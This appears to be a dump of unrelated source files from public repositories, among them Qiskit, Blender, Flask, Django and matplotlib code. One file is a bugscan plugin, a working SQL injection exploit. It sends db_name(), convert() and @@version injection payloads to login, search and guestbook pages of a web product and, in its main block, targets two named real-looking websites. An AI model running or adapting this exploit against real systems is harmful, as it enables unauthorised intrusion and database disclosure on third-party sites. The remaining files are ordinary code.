            euler_angles = [0., 0., angle_value]
            self._current_angle_value[2] = next_angle_value
            self._settings['roll'] = next_angle_value
        angles = euler_angles
        angles = [radians(x) for x in angles]
        rotation = maths.eulerToRotationMatrix3(angles)
        zincutils.transform_coordinates(self._scaffold_coordinate_field, rotation)
        self._apply_callback()
    def translate_scaffold(self, axis, value, rate):
        # Apply the *incremental* translation from the last applied
        # absolute position to value * rate along axis 'X', 'Y' or 'Z',
        # then record the new absolute value and notify the observer.
        next_axis_value = value * rate
        if axis == 'X':
            if next_axis_value > self._current_axis_value[0]:
                axis_value = next_axis_value - self._current_axis_value[0]
            else:
                axis_value = -(self._current_axis_value[0] - next_axis_value)
            new_coordinates = [axis_value, 0., 0.]
            self._current_axis_value[0] = next_axis_value
            self._settings['X'] = next_axis_value
        elif axis == 'Y':
            if next_axis_value > self._current_axis_value[1]:
                axis_value = next_axis_value - self._current_axis_value[1]
            else:
                axis_value = -(self._current_axis_value[1] - next_axis_value)
            new_coordinates = [0., axis_value, 0.]
            self._current_axis_value[1] = next_axis_value
            self._settings['Y'] = next_axis_value
        else:
            if next_axis_value > self._current_axis_value[2]:
                axis_value = next_axis_value - self._current_axis_value[2]
            else:
                axis_value = -(self._current_axis_value[2] - next_axis_value)
            new_coordinates = [0., 0., axis_value]
            self._current_axis_value[2] = next_axis_value
            self._settings['Z'] = next_axis_value
        offset = new_coordinates
        zincutils.offset_scaffold(self._scaffold_coordinate_field, offset)
        self._apply_callback()
| [
"m.osanlouy@auckland.ac.nz"
] | m.osanlouy@auckland.ac.nz |
4620ec8b24a8b30d7078db3e41d39d5b8bd26563 | 449b3edf6ed1649f64f133533d6214f6679e6f2c | /customers/urls.py | 56177910b5e6f49a051e05a280b2230ab46e2888 | [
"MIT"
] | permissive | endonte/quotation2 | bbd82b0ab0ad524d19294e14bcc4752949cbbe03 | ddb9bf2f98ea8b45c9c43f272e61bb85fb563613 | refs/heads/master | 2021-01-15T14:19:36.476070 | 2017-08-21T07:20:07 | 2017-08-21T07:20:07 | 99,687,769 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | from django.conf.urls import url
from .views import CustomerListView
# Map the app's root URL to the customer list view.
urlpatterns = [
    url(r'^$', CustomerListView.as_view(), name='customer_list'),
]
| [
"endonte88@gmail.com"
] | endonte88@gmail.com |
6885710c04ad189c6b12a2d576cb1720f585575d | 3ebed5d25b0f325736e435f03fb7cbf027a18da4 | /emc/memberArea/content/todo.py | e9aa77b5821b18022f4476034567cd627719d21f | [] | no_license | adam139/emc.memberArea | 82950eca452c781d0976d5f1c5c3140526f5823e | a549074240d780933cb590ce46c78bdecdbda654 | refs/heads/master | 2022-05-31T18:44:58.841750 | 2020-09-29T12:59:16 | 2020-09-29T12:59:16 | 47,908,455 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | #-*- coding: UTF-8 -*-
from plone.directives import form
class ITodo(form.Schema):
    """Schema interface for the personal to-do items container content
    type in the EMC project member area.
    No fields are declared yet; the interface currently only identifies
    the content type.
    """
| [
"yuejun.tang@gmail.com"
] | yuejun.tang@gmail.com |
8eac734c22821c8104fc1c4200d29219a39df2d8 | 0c955ea058eae749695835b31d07f60775631f36 | /test_plots/test_patches.py | cbcab29018475b5a3089ff91f30d532cf115c260 | [
"BSD-3-Clause"
] | permissive | Ahmed/mpld3 | f75934ee5e0da196eb4440f19b54cbf9dab58d0c | edb9c82e1555b778adea932a55b51ca6dc3de6e4 | refs/heads/master | 2020-12-07T00:33:17.193173 | 2014-04-02T09:39:22 | 2014-04-02T09:39:22 | 18,023,559 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | """Plot to test patches"""
import matplotlib.pyplot as plt
from matplotlib import patches
import numpy as np
def main():
    """Build and return a figure exercising a variety of matplotlib
    patch types with random semi-transparent styling."""
    fig, ax = plt.subplots()
    ax.grid(color='lightgray')
    # Random RGB triple used for face and edge colours.
    rcolor = lambda: np.random.random(3)
    p = [patches.Arrow(0.75, 0.75, 0.5, 0.5),
         patches.Circle((1, 2), 0.4),
         patches.RegularPolygon((1, 3), 5, 0.4),
         patches.Rectangle((1.6, 0.75), 0.8, 0.5),
         patches.CirclePolygon((2, 2), 0.4),
         patches.Polygon([[1.75, 3], [2, 3.25], [2.25, 3],
                          [2, 2.75], [1.75, 3]]),
         patches.Wedge((3, 1), 0.4, 0, 270),
         patches.Ellipse((3, 2), 0.6, 0.4),
         patches.Arc((3, 3), 0.5, 0.5, 270, 90),
         ]
    # Style each patch randomly before adding it to the axes.
    for patch in p:
        patch.set_facecolor(rcolor())
        patch.set_edgecolor(rcolor())
        patch.set_alpha(0.5)
        patch.set_linewidth(2)
        ax.add_patch(patch)
    # add a static patch (fixed colours, in axes coordinates)
    ax.add_patch(patches.Rectangle((0.3, 0.4), 0.4, 0.4,
                                   fc='yellow', ec='black', alpha=0.3,
                                   transform=ax.transAxes))
    # make sure axes ratio is equal
    ax.set_xlim(0.5, 0.5 + 3. * 4. / 3.)
    ax.set_ylim(0.5, 3.5)
    ax.set_title("Various Patches", size=16)
    return fig
if __name__ == '__main__':
    # Build and display the test figure when run as a script.
    main()
    plt.show()
| [
"vanderplas@astro.washington.edu"
] | vanderplas@astro.washington.edu |
9e9053f992d74ab70ebb2bf5c40292d1251d11e6 | 60ff82c168f247728fa88ca8e748b61876d6b5c3 | /Chrome/GuestUser/ExploreCompaniesPage/TopSection/Test_SecondHeadline.py | bbf4c1031950ca663d8ae51e6b3461ec5d0fbfb5 | [] | no_license | mariana-rusu/the.muse | 2b9bee8a7740c3f305463cbfc28ebd3bacd49907 | 58434e3ad45795cb980aca8d6b5c67132b8a855c | refs/heads/master | 2021-01-12T07:33:04.831570 | 2017-01-09T21:02:52 | 2017-01-09T21:02:52 | 76,977,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 850 | py | from selenium import webdriver
import unittest
import time
class SecondHeadline(unittest.TestCase):
    """Guest-user checks for the second headline in the top section of
    the "Explore Companies" page on themuse.com (Chrome)."""
    def setUp(self):
        # Open the home page and click through to "Explore Companies".
        self.driver = webdriver.Chrome()
        self.driver.maximize_window()
        self.driver.get("https://www.themuse.com/")
        time.sleep(1)
        explore_companies = self.driver.find_element_by_xpath("/html/body/header/nav[2]/a[1]")
        explore_companies.click()
    def test_Headline_is_found(self):
        driver = self.driver
        # find_element_by_xpath raises NoSuchElementException when the
        # element is missing, so reaching the assert means it was found.
        assert (driver.find_element_by_xpath("//div/div/div[2]/div[1]/div/div[1]/h2"))
    def test_Headline_text_is_found(self):
        driver = self.driver
        element = driver.find_element_by_xpath("//div/div/div[2]/div[1]/div/div[1]/h2")
        self.assertEqual(element.text,"Browse offices before you apply.")
    def tearDown(self):
        self.driver.quit()
"mirabelia@yahoo.com"
] | mirabelia@yahoo.com |
95f800ba3a4d4c934ae6e706cea07edfc6d46be1 | e233f9bf52ad0f88416962edd957a3c866c19b78 | /reagent/test/base/horizon_test_base.py | 676c00c95aa0b12b78c937e5cb05f5420ff12268 | [
"BSD-3-Clause"
] | permissive | dwtcourses/ReAgent | 38c99dfe47adf1471620419f744cb4145f4f4151 | b9b54d4f30ff65cf1c54dc0cf90c938b48c44f90 | refs/heads/master | 2022-04-26T15:35:46.109984 | 2020-04-29T05:38:14 | 2020-04-29T05:40:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import unittest
from reagent.tensorboardX import SummaryWriterContext
class HorizonTestBase(unittest.TestCase):
    """Base TestCase that resets SummaryWriterContext's module-level
    globals before and after each test, keeping tests isolated."""
    def setUp(self):
        SummaryWriterContext._reset_globals()
    def tearDown(self):
        SummaryWriterContext._reset_globals()
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
48ca418ae561d715421faaa683c95b01c751cfac | 7c5304c697f858147f5a6655eef814bc32872848 | /setup.py | 6d00328ae8f4d9c7e715cc77af03403589f75a1e | [
"MIT",
"BSD-2-Clause"
] | permissive | MadisKarli/pyJuliusAlign | 2d5e644363f20cbe1265bb183df79724e12963e4 | 2e2a9951e7599f5dc83a977bc6605c515afec253 | refs/heads/master | 2022-01-06T00:37:29.734312 | 2019-02-23T23:42:37 | 2019-02-23T23:42:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 722 | py | #!/usr/bin/env python
# encoding: utf-8
'''
Created on Aug 29, 2014
@author: tmahrt
'''
from setuptools import setup
import io
# Package metadata for pyjuliusalign (Japanese forced alignment with Julius).
setup(name='pyjuliusalign',
      version='2.0.3',
      author='Tim Mahrt',
      author_email='timmahrt@gmail.com',
      url='https://github.com/timmahrt/pyJuliusAlign',
      package_dir={'pyjuliusalign': 'pyjuliusalign'},
      packages=['pyjuliusalign'],
      # Kana transliteration charts shipped as package data.
      package_data={'pyjuliusalign': ["hiraganaChart.txt", "katakanaChart.txt"]},
      license='LICENSE',
      description='A helper library for doing forced-alignment in Japanese with Julius.',
      long_description=io.open('README.md', 'r', encoding="utf-8").read(),
      long_description_content_type='text/markdown',
      )
| [
"timmahrt@gmail.com"
] | timmahrt@gmail.com |
dad36b398af2b8faf8d022d56955587525f59b3b | 1ba2b4a507783eb2051887b9ecbed85d87e4c16b | /qiskit/algorithms/aux_ops_evaluator.py | 9ce9349a7de8f236e92d1aadf7ead38d663f97ec | [
"Apache-2.0"
] | permissive | manoelmarques/qiskit-terra | 34a948605d98168b1344cee1fd6adc117a137f25 | 71dd7f7b9603e1991f9d97fef66bb9b63d552c91 | refs/heads/main | 2023-04-30T08:42:15.886082 | 2023-02-15T21:58:01 | 2023-02-15T21:58:01 | 228,042,086 | 0 | 0 | Apache-2.0 | 2019-12-14T15:07:03 | 2019-12-14T15:07:02 | null | UTF-8 | Python | false | false | 7,407 | py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2021, 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Evaluator of auxiliary operators for algorithms."""
from typing import Tuple, Union, List
import numpy as np
from qiskit import QuantumCircuit
from qiskit.opflow import (
CircuitSampler,
ListOp,
StateFn,
OperatorBase,
ExpectationBase,
)
from qiskit.providers import Backend
from qiskit.quantum_info import Statevector
from qiskit.utils import QuantumInstance
from qiskit.utils.deprecation import deprecate_function
from .list_or_dict import ListOrDict
@deprecate_function(
    "The eval_observables function has been superseded by the "
    "qiskit.algorithms.observables_evaluator.estimate_observables function. "
    "This function will be deprecated in a future release and subsequently "
    "removed after that.",
    category=PendingDeprecationWarning,
)
def eval_observables(
    quantum_instance: Union[QuantumInstance, Backend],
    quantum_state: Union[
        Statevector,
        QuantumCircuit,
        OperatorBase,
    ],
    observables: ListOrDict[OperatorBase],
    expectation: ExpectationBase,
    threshold: float = 1e-12,
) -> ListOrDict[Tuple[complex, complex]]:
    """
    Pending deprecation: Accepts a list or a dictionary of operators and calculates
    their expectation values - means
    and standard deviations. They are calculated with respect to a quantum state provided. A user
    can optionally provide a threshold value which filters mean values falling below the threshold.
    This function has been superseded by the
    :func:`qiskit.algorithms.observables_evaluator.eval_observables` function.
    It will be deprecated in a future release and subsequently
    removed after that.
    Args:
        quantum_instance: A quantum instance used for calculations.
        quantum_state: An unparametrized quantum circuit representing a quantum state that
            expectation values are computed against.
        observables: A list or a dictionary of operators whose expectation values are to be
            calculated.
        expectation: An instance of ExpectationBase which defines a method for calculating
            expectation values.
        threshold: A threshold value that defines which mean values should be neglected (helpful for
            ignoring numerical instabilities close to 0).
    Returns:
        A list or a dictionary of tuples (mean, standard deviation).
    Raises:
        ValueError: If a ``quantum_state`` with free parameters is provided.
    """
    if (
        isinstance(
            quantum_state, (QuantumCircuit, OperatorBase)
        ) # Statevector cannot be parametrized
        and len(quantum_state.parameters) > 0
    ):
        raise ValueError(
            "A parametrized representation of a quantum_state was provided. It is not "
            "allowed - it cannot have free parameters."
        )
    # Create new CircuitSampler to avoid breaking existing one's caches.
    sampler = CircuitSampler(quantum_instance)
    # One ListOp of <state|obs|state> expectation expressions, one entry
    # per observable.
    list_op = _prepare_list_op(quantum_state, observables)
    observables_expect = expectation.convert(list_op)
    observables_expect_sampled = sampler.convert(observables_expect)
    # compute means
    values = np.real(observables_expect_sampled.eval())
    # compute standard deviations
    std_devs = _compute_std_devs(
        observables_expect_sampled, observables, expectation, quantum_instance
    )
    # Discard values below threshold (the boolean mask zeroes small
    # means rather than dropping entries).
    observables_means = values * (np.abs(values) > threshold)
    # zip means and standard deviations into tuples
    observables_results = list(zip(observables_means, std_devs))
    # Return None eigenvalues for None operators if observables is a list.
    # None operators are already dropped in compute_minimum_eigenvalue if observables is a dict.
    return _prepare_result(observables_results, observables)
def _prepare_list_op(
    quantum_state: Union[
        Statevector,
        QuantumCircuit,
        OperatorBase,
    ],
    observables: ListOrDict[OperatorBase],
) -> ListOp:
    """Bundle all observables into a single ``ListOp`` of measurements.

    Each observable is wrapped as a measurement ``StateFn`` and composed
    with the (state-wrapped) quantum state, so evaluating the returned
    ``ListOp`` yields one expectation value per observable.

    Args:
        quantum_state: An unparametrized circuit/state the expectation
            values are computed against.
        observables: A list or a dictionary of operators.

    Returns:
        A ``ListOp`` with one composed measurement per observable.
    """
    ops = observables.values() if isinstance(observables, dict) else observables
    state = quantum_state if isinstance(quantum_state, StateFn) else StateFn(quantum_state)
    measurements = [StateFn(op, is_measurement=True).compose(state) for op in ops]
    return ListOp(measurements)
def _prepare_result(
observables_results: List[Tuple[complex, complex]],
observables: ListOrDict[OperatorBase],
) -> ListOrDict[Tuple[complex, complex]]:
"""
Prepares a list or a dictionary of eigenvalues from ``observables_results`` and
``observables``.
Args:
observables_results: A list of of tuples (mean, standard deviation).
observables: A list or a dictionary of operators whose expectation values are to be
calculated.
Returns:
A list or a dictionary of tuples (mean, standard deviation).
"""
if isinstance(observables, list):
observables_eigenvalues = [None] * len(observables)
key_value_iterator = enumerate(observables_results)
else:
observables_eigenvalues = {}
key_value_iterator = zip(observables.keys(), observables_results)
for key, value in key_value_iterator:
if observables[key] is not None:
observables_eigenvalues[key] = value
return observables_eigenvalues
def _compute_std_devs(
observables_expect_sampled: OperatorBase,
observables: ListOrDict[OperatorBase],
expectation: ExpectationBase,
quantum_instance: Union[QuantumInstance, Backend],
) -> List[complex]:
"""
Calculates a list of standard deviations from expectation values of observables provided.
Args:
observables_expect_sampled: Expected values of observables.
observables: A list or a dictionary of operators whose expectation values are to be
calculated.
expectation: An instance of ExpectationBase which defines a method for calculating
expectation values.
quantum_instance: A quantum instance used for calculations.
Returns:
A list of standard deviations.
"""
variances = np.real(expectation.compute_variance(observables_expect_sampled))
if not isinstance(variances, np.ndarray) and variances == 0.0:
# when `variances` is a single value equal to 0., our expectation value is exact and we
# manually ensure the variances to be a list of the correct length
variances = np.zeros(len(observables), dtype=float)
std_devs = np.sqrt(variances / quantum_instance.run_config.shots)
return std_devs
| [
"noreply@github.com"
] | manoelmarques.noreply@github.com |
5d268dd6a1d73ac3491ec9214064db7e76186d8e | f6db8d85a3b41eed543959314d65927353a8229c | /.history/W5/restaurant/forms_20201202155445.py | 54887e8fa52493f1ec9492f492ded07847b4da12 | [] | no_license | NFEL/DjangoPaeez99 | d573cc8e36500f08bc104d76f7a2628062d86c2f | 621636bfb47d71f2a4f45037b7264dd5ebc7cdd7 | refs/heads/main | 2023-01-27T22:05:57.788049 | 2020-12-08T10:08:28 | 2020-12-08T10:08:28 | 304,553,353 | 1 | 2 | null | 2020-10-16T07:33:04 | 2020-10-16T07:33:03 | null | UTF-8 | Python | false | false | 219 | py | from django import forms
# from django.db.models import fields
from .models import ElementAddress
class NearByReastaurants(forms.ModelForm):
    """ModelForm exposing only the ``element`` field of ElementAddress.

    Used to pick a location element when searching for nearby restaurants.
    NOTE(review): the class name misspells "Restaurants"; renaming would
    break importers, so it is left as-is.
    """
    class Meta:
        model = ElementAddress
        fields = ('element',)
"nfilsaraee@gmail.com"
] | nfilsaraee@gmail.com |
54fac0e0c625b35779f704ceba5b0921fa2f22a7 | 74faed0c7465e7fa629400ddfdcfd58f66a6d6e3 | /manage.py | 2b0a775b4b720d0487a55eea64bf1dabb56717ae | [] | no_license | dengshilong/test-flask | 5952dc28d39588705f71bc87cba6c50fcb959e92 | 847c51ea524e6ffde211ca41c82f21997cf02899 | refs/heads/master | 2021-01-19T20:08:01.744585 | 2017-04-17T09:17:22 | 2017-04-17T09:17:22 | 88,488,163 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | #!/usr/bin/env python
# pylint: disable=wrong-import-position
import os
from test_flask import create_app, db
from flask_script import Manager, Shell
from flask_migrate import Migrate, MigrateCommand
from test_flask.models import User, Address
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
manager = Manager(app)
migrate = Migrate(app, db)
def make_shell_context():
    """Expose common objects (app, db, models) to ``manage.py shell``."""
    return {"app": app, "db": db, "User": User, "Address": Address}
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
@manager.command
def test():
"""Run the unit tests."""
import unittest
tests = unittest.TestLoader().discover('tests')
unittest.TextTestRunner(verbosity=2).run(tests)
if __name__ == '__main__':
manager.run()
| [
"dengshilong1988@gmail.com"
] | dengshilong1988@gmail.com |
37dee3f1ada38b2abb4fe10458182260e4944d89 | a045c20593669cbb82395e58dc116154d5c6c86b | /stalker_hud_rig_helper/ui.py | 869ecbe3aee0c3af278fed8ba20c965e1b6658e9 | [] | no_license | PavelBlend/blender-stalker-hud-rig-helper-addon | 4eba43cf49c1b815048d54ad1205456e9ea3eb92 | 6ebeabbca92788cdb70f4cb286bf6f5b6e47b014 | refs/heads/master | 2020-06-04T20:23:39.285879 | 2019-06-16T09:38:18 | 2019-06-16T09:38:18 | 192,179,043 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,584 | py | import bpy
class _ListOp(bpy.types.Operator):
    """Generic add/remove/move operator for a UI collection list.

    Works on a CollectionProperty and its companion active-index
    IntProperty, both addressed *by name* on a data object that the
    drawing code attaches to the context (see draw_list_ops).
    """
    bl_idname = 'io_scene_xray.list'
    bl_label = ''
    # one of: 'add', 'remove', 'move_up', 'move_down'
    operation = bpy.props.StringProperty()
    # name of the CollectionProperty on the context data object
    collection = bpy.props.StringProperty()
    # name of the IntProperty holding the active index
    index = bpy.props.StringProperty()
    def execute(self, context):
        """Apply ``self.operation`` to the target collection."""
        # The data object is passed in via context_pointer_set() under a
        # key derived from this operator's idname.
        data = getattr(context, _ListOp.bl_idname + '.data')
        collection = getattr(data, self.collection)
        index = getattr(data, self.index)
        if self.operation == 'add':
            collection.add().name = ''
        elif self.operation == 'remove':
            collection.remove(index)
            # keep the active index in range after the removal
            if index > 0:
                setattr(data, self.index, index - 1)
        elif self.operation == 'move_up':
            collection.move(index, index - 1)
            setattr(data, self.index, index - 1)
        elif self.operation == 'move_down':
            collection.move(index, index + 1)
            setattr(data, self.index, index + 1)
        return {'FINISHED'}
def draw_list_ops(layout, dataptr, propname, active_propname):
    """Draw add/remove/move-up/move-down buttons for a collection list.

    ``propname``/``active_propname`` name the collection and active-index
    properties on ``dataptr``; they are forwarded to _ListOp by name.
    """
    # Make the data object reachable from the operator via the context.
    layout.context_pointer_set(_ListOp.bl_idname + '.data', dataptr)
    items = getattr(dataptr, propname)
    index = getattr(dataptr, active_propname)
    in_range = (index >= 0) and (index < len(items))

    def draw_button(operation, icon, enabled=True):
        target = layout
        if not enabled:
            # draw the button greyed-out in its own sub-layout
            target = target.split(align=True)
            target.enabled = False
        op = target.operator(_ListOp.bl_idname, icon=icon)
        op.operation = operation
        op.collection = propname
        op.index = active_propname

    draw_button('add', 'ZOOMIN')
    draw_button('remove', 'ZOOMOUT', enabled=in_range)
    draw_button('move_up', 'TRIA_UP', enabled=(index > 0) and (index < len(items)))
    draw_button('move_down', 'TRIA_DOWN', enabled=in_range and (index < len(items) - 1))
class BoneList(bpy.types.UIList):
    """UIList row showing one hand-bone -> weapon-bone -> offset-bone mapping."""
    def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
        """Draw a single bone-mapping row; the active row gets a checked box."""
        obj = context.object
        stk_data = obj.data.stalker_rig_helper
        if stk_data.bone_collection_index == index:
            icon = 'CHECKBOX_HLT'
        else:
            icon = 'CHECKBOX_DEHLT'
        bone = stk_data.bone_collection[index]
        row = layout.row()
        row.label(text='', icon=icon)
        row.prop_search(bone, 'hand_bone', obj.data, 'bones', text='')
        wpn_obj = bpy.data.objects.get(stk_data.weapon_armature, None)
        # Fix: the weapon armature may be unset or renamed; the original code
        # raised AttributeError on ``wpn_obj.data`` when the lookup failed.
        if wpn_obj is not None:
            row.prop_search(bone, 'wpn_bone', wpn_obj.data, 'bones', text='')
        else:
            row.label(text='', icon='ERROR')
        row.prop_search(bone, 'offset_bone', obj.data, 'bones', text='')
class STALKER_HUD_Rig_Helper_Panel(bpy.types.Panel):
    """Armature-data panel for binding hand bones to weapon bones."""
    bl_space_type = "PROPERTIES"
    bl_region_type = "WINDOW"
    bl_context = "data"
    bl_options = {'DEFAULT_CLOSED'}
    bl_label = 'STALKER HUD Rig Helper'
    @classmethod
    def poll(cls, context):
        """Show the panel only for armature objects."""
        obj = context.object
        return bool(obj) and obj.type == 'ARMATURE'
    def draw(self, context):
        """Draw the armature selector, the bone-mapping list and the tie operator."""
        obj = context.object
        stk_data = obj.data.stalker_rig_helper
        lay = self.layout
        # The armature selector is always shown; the rest of the UI appears
        # only once a valid weapon armature distinct from this one is chosen.
        wpn_obj = bpy.data.objects.get(stk_data.weapon_armature, None)
        lay.row().prop_search(stk_data, 'weapon_armature', bpy.data, 'objects')
        invalid = (
            not wpn_obj
            or wpn_obj.type != 'ARMATURE'
            or wpn_obj.name == obj.name
        )
        if invalid:
            return
        header = lay.row()
        header.label('Hand Bones')
        header.label(icon='FORWARD')
        header.label('Weapon Bones')
        header.label(icon='FORWARD')
        header.label('Offset Bones')
        body = lay.row()
        list_col = body.column()
        list_col.template_list(
            'BoneList', 'name',
            stk_data, 'bone_collection',
            stk_data, 'bone_collection_index'
        )
        ops_col = body.column(align=True)
        draw_list_ops(
            ops_col, stk_data,
            'bone_collection', 'bone_collection_index',
        )
        lay.operator('stalker_rig_helper.tie_weapon')
def register():
    """Register all addon UI classes with Blender."""
    for ui_class in (_ListOp, BoneList, STALKER_HUD_Rig_Helper_Panel):
        bpy.utils.register_class(ui_class)
def unregister():
    """Unregister the addon UI classes in reverse registration order."""
    for ui_class in (STALKER_HUD_Rig_Helper_Panel, BoneList, _ListOp):
        bpy.utils.unregister_class(ui_class)
| [
"stalkermodkytia@yandex.ru"
] | stalkermodkytia@yandex.ru |
3bb521fa84719f1797e0bb0b6e9dc5230ea3ed5a | e0c8662a56d89730043146ddc340e9e0b9f7de72 | /plugin/11c6ffa2-1596.py | 634f6b84e257b4ab196fc2c9b9eed72c5fc1cb73 | [] | no_license | izj007/bugscan_poc | f2ef5903b30b15c230b292a1ff2dc6cea6836940 | 4490f3c36d4033bdef380577333722deed7bc758 | refs/heads/master | 2020-09-22T17:20:50.408078 | 2019-01-18T09:42:47 | 2019-01-18T09:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,556 | py | #coding:utf-8
from lib.curl import *
# -*- coding: utf-8 -*-
#author:小光
#refer:http://www.wooyun.org/bugs/wooyun-2010-070091
#refer:http://www.wooyun.org/bugs/wooyun-2010-077673
#refer:http://www.wooyun.org/bugs/wooyun-2010-082926
def assign(service, arg):
    """Claim the scan task: return (True, arg) for 'jienuohan', else None."""
    if service != "jienuohan":
        return None
    return True, arg
def audit(arg):
    """Probe known injectable endpoints; report any that leak db_name().

    Each payload path is POSTed its matching injection body; a response
    containing 'master' indicates the injected db_name()/convert() call
    surfaced database metadata.
    """
    payloads = [
        'Web/Login.aspx',
        'web/KeySearch.aspx?searchid=1',
        'KeySearch.aspx',
        'KeySearch.aspx',
        'KeySearch.aspx',
        'liuyan.aspx',
        'liuyan.aspx',
        'liuyan.aspx',
    ]
    postdatas = [
        'username=1%27%20and%20db_name%281%29%3E1--',
        'operat=Search&state=&keyword=1%25%27%20and%20db_name%281%29%3E1--',
        'title=1%27%20AND%20db_name%281%29%3E1--',
        'author=1%27%20AND%20db_name%281%29%3E1--',
        'keyword=1%27%20AND%20db_name%281%29%3E1--',
        'LinkTel=1%27%2b%20convert%28int%2C%28db_name%281%29%29%29%20%2b%27',
        'Mail=1%27%2b%20convert%28int%2C%28db_name%281%29%29%29%20%2b%27',
        'username=1%27%2b%20%28select%20convert%28int%2C%28@@version%29%29%20FROM%20syscolumns%29%20%2b%27'
    ]
    for payload, postdata in zip(payloads, postdatas):
        url = arg + payload
        code, head, res, errcode, _ = curl.curl2(url, postdata)
        if 'master' in res:
            security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('jienuohan','http://www.cnemergency.com/')[1])
audit(assign('jienuohan','http://ctc.hlglzz.com/')[1])
| [
"yudekui@wsmtec.com"
] | yudekui@wsmtec.com |
bf5ff7b4246763917fcc89424e632f404a4f5308 | af41c215f420bbd66067d6dc851ce41d9ed40819 | /GBRBM/test_mini_movie.py | ad0397fa82fa6eb437eb6ead354ff9ac8e500f35 | [] | no_license | danathughes/pyNeuralNetwork | b704f525bddbc64eabf33c1174dad0649be7bfd9 | dbe2090e50434f33ac7a46845ad67eb5dc7dea87 | refs/heads/master | 2021-01-01T16:30:47.781646 | 2016-01-27T23:11:51 | 2016-01-27T23:11:51 | 19,729,930 | 0 | 4 | null | 2015-02-27T22:22:18 | 2014-05-13T07:32:24 | Python | UTF-8 | Python | false | false | 987 | py | from RBM import *
def get_RBM():
    """Train a 6-visible / 2-hidden RBM on a toy movie-ratings dataset.

    Returns (trained_rbm, dataset).  Python 2 code (print statements).
    """
    r = RBM(6,2)
    # CD-k: number of Gibbs-sampling steps per contrastive-divergence update
    k = 9
    # Six "users" rating six "movies": the first three rows favour the first
    # columns, the last three favour the middle/right columns.
    dataset = [[0.9,0.8,0.9,0.1,0.2,0.2],
               [0.9,0.4,0.8,0.2,0.1,0.2],
               [0.8,1.0,0.9,0.0,0.1,0.0],
               [0.1,0.1,0.9,0.8,1.0,0.2],
               [0.2,0.1,0.9,0.9,0.9,0.1],
               [0.1,0.2,1.0,0.9,0.8,0.1]]
    # Train at the following learning rates:
    print "Training..."
    # Anneal the learning rate downwards; 100 epochs at each rate.
    learning_rates = [0.1, 0.05, 0.01, 0.005, 0.001, 0.0005, 0.0001]
    # learning_rates = [0.1]
    for rate in learning_rates:
        print "Learning rate =", rate
        for i in range(100):
            print ' ' + str(i) + '...',
            r.train_epoch(dataset, rate, k)
            # Report several fit diagnostics after each epoch:
            err = np.sum([r.free_energy(data) for data in dataset])
            print 'Energy = ' + str(err) + '...',
            PL = r.pseudolikelihood(dataset)
            print 'Pseudolikelihood = ' + str(PL) + '...',
            L = r.likelihood(dataset)
            print 'Likelihood = ' + str(L) + '...',
            print 'Done'
    return r, dataset
| [
"danathughes@gmail.com"
] | danathughes@gmail.com |
276efaa89b7025eb62f18860f10c254de3df0147 | 26edf9a7a579782e72753c82082047ebe23a5080 | /catalyst/contrib/models/cv/segmentation/blocks/fpn.py | 2c3106814fe5f3f1db7a7f92fde028fe271e8148 | [
"Apache-2.0"
] | permissive | 418sec/catalyst | e8578c3561d54053bf53cb065d5ab516a2c505e9 | 8ce39fc31635eabc348b055a2df8ec8bc5700dce | refs/heads/master | 2023-02-17T22:18:57.257809 | 2021-01-21T09:27:46 | 2021-01-21T09:27:46 | 327,367,304 | 0 | 1 | Apache-2.0 | 2021-01-21T09:27:47 | 2021-01-06T16:24:31 | null | UTF-8 | Python | false | false | 3,708 | py | # flake8: noqa
# @TODO: code formatting issue for 20.07 release
import torch
from torch import nn
from torch.nn import functional as F
from catalyst.contrib.models.cv.segmentation.blocks.core import DecoderBlock
class DecoderFPNBlock(DecoderBlock):
    """FPN decoder step: upsample the coarser ("bottom") feature map and add
    the 1x1-projected lateral ("left") encoder feature map to it."""
    def __init__(
        self,
        in_channels: int,
        enc_channels: int,
        out_channels: int,
        in_strides: int = None,
        upsample_scale: int = 2,
        interpolation_mode: str = "nearest",
        align_corners: bool = None,
        aggregate_first: bool = False,
        **kwargs
    ):
        """
        Args:
            in_channels: channels of the bottom (coarser) feature map
            enc_channels: channels of the lateral encoder feature map
            out_channels: channels produced by the 1x1 lateral projection
            in_strides: input stride bookkeeping, forwarded to the base class
            upsample_scale: spatial scale factor applied to the bottom map
            interpolation_mode: mode passed to ``F.interpolate``
            align_corners: forwarded to ``F.interpolate``
            aggregate_first: unused in this class; presumably kept for
                signature parity with sibling decoder blocks -- confirm
        """
        # These attributes are set before super().__init__ on purpose:
        # the base constructor presumably calls _get_block(), which needs
        # them available -- TODO confirm against DecoderBlock.
        self.upsample_scale = upsample_scale
        self.interpolation_mode = interpolation_mode
        self.align_corners = align_corners
        super().__init__(
            in_channels, enc_channels, out_channels, in_strides, **kwargs
        )
    def _get_block(self):
        """Return the 1x1 conv projecting encoder channels to out_channels."""
        block = nn.Conv2d(self.enc_channels, self.out_channels, kernel_size=1)
        return block
    def forward(
        self, bottom: torch.Tensor, left: torch.Tensor
    ) -> torch.Tensor:
        """Upsample ``bottom``, project ``left``, and return their sum."""
        x = F.interpolate(
            bottom,
            scale_factor=self.upsample_scale,
            mode=self.interpolation_mode,
            align_corners=self.align_corners,
        )
        left = self.block(left)
        x = x + left
        return x
